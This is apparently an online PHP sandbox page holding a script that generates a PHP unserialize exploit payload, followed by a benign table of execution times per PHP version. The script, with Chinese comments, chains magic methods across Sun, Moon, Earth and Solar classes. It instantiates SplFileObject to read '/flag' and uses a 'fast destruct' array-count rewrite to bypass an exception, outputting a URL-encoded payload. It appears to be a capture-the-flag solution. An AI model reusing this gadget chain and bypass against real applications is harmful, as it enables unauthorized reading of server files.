Online PHP editor | perf for nKif6

@ 2026-02-08T12:47:18Z

<?php
// 定义类结构，用于序列化
class Sun { public $sun; }
class Moon { public $nearside; }
class Earth { public $onearth; public $inearth; public $outofearth; }
class Solar { public $Mercury; public $Venus; public $Mars; public $Jupiter; public $Saturn; }

$sun = new Sun();
$moon = new Moon();
$earth = new Earth();
$solarA = new Solar(); // 触发 __set 的对象
$solarB = new Solar(); // 触发 __call 的对象

// 1. 串联链条
$sun->sun = $moon;               // Sun::__destruct -> Moon::__tostring
$moon->nearside = $earth;        // Moon::__tostring -> Earth::__invoke

// 2. 核心跳转：Earth -> SolarA::__set
$earth->onearth = $solarA;
$earth->inearth = "Mars";        // 触发 __set 的 $name
$earth->outofearth = "/flag";    // 赋给 $solarA->Mars，即 __call 的参数 $args[0]

// 3. 核心爆发：SolarA::__set -> SolarB::__call
$solarA->Mercury = $solarB;
$solarA->Venus = "SplFileObject"; // 关键！赋给 $func，即 new SplFileObject

// 4. 原生类执行：SolarB::__call
$solarB->Jupiter = "current";     // SplFileObject 读取内容的方法
$solarB->Saturn = "";             // 方法参数

// 5. 生成绕过 Exception 的 Payload
$payload = array($sun);
$ser = serialize($payload);
// 通过修改数组元素数量，触发 Fast Destruct 绕过 throw new Exception
$final_payload = str_replace('a:1:{i:0;', 'a:2:{i:0;', $ser);

echo "Final URL Encoded Payload:\n\n";
echo urlencode($final_payload);
?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

Version	System time (s)	User time (s)	Memory (MiB)
8.5.3	0.010	0.009	19.34
8.5.2	0.032	0.009	16.71
8.5.1	0.030	0.011	16.21
8.5.0	0.041	0.003	16.46
8.4.18	0.014	0.014	19.66
8.4.17	0.036	0.008	19.71
8.4.16	0.034	0.009	19.64
8.4.15	0.032	0.011	19.54
8.4.14	0.036	0.010	17.51
8.4.13	0.034	0.011	17.77
8.4.12	0.036	0.009	17.66
8.4.11	0.039	0.007	17.73
8.4.10	0.041	0.011	17.46
8.4.9	0.038	0.010	17.52
8.4.8	0.040	0.007	17.90
8.4.7	0.037	0.009	17.92
8.4.6	0.037	0.011	17.55
8.4.5	0.038	0.008	17.53
8.4.4	0.042	0.008	17.46
8.4.3	0.041	0.008	17.38
8.4.2	0.039	0.012	17.79
8.4.1	0.042	0.006	17.60
8.3.30	0.033	0.010	18.18
8.3.29	0.033	0.011	18.28
8.3.28	0.032	0.009	18.27
8.3.27	0.032	0.013	16.63
8.3.26	0.035	0.011	16.68
8.3.25	0.041	0.008	16.72
8.3.24	0.036	0.007	16.49
8.3.23	0.032	0.006	16.65
8.3.22	0.040	0.006	16.71
8.3.21	0.037	0.008	16.66
8.3.20	0.034	0.011	16.67
8.3.19	0.036	0.009	16.43
8.3.18	0.035	0.011	16.32
8.3.17	0.044	0.009	16.51
8.3.16	0.040	0.010	16.52
8.3.15	0.041	0.007	16.48
8.3.14	0.043	0.007	16.32
8.3.13	0.036	0.009	16.50
8.3.12	0.030	0.011	16.73
8.3.11	0.033	0.008	16.64
8.3.10	0.040	0.007	16.32
8.3.9	0.039	0.009	16.42
8.3.8	0.039	0.010	16.52
8.3.7	0.039	0.011	16.63
8.3.6	0.039	0.008	16.50
8.3.5	0.037	0.010	16.61
8.3.4	0.041	0.006	18.02
8.3.3	0.029	0.008	17.85
8.3.2	0.028	0.009	17.98
8.3.1	0.028	0.009	17.85
8.3.0	0.029	0.008	17.66

preferences:dark modelive previewkey bindings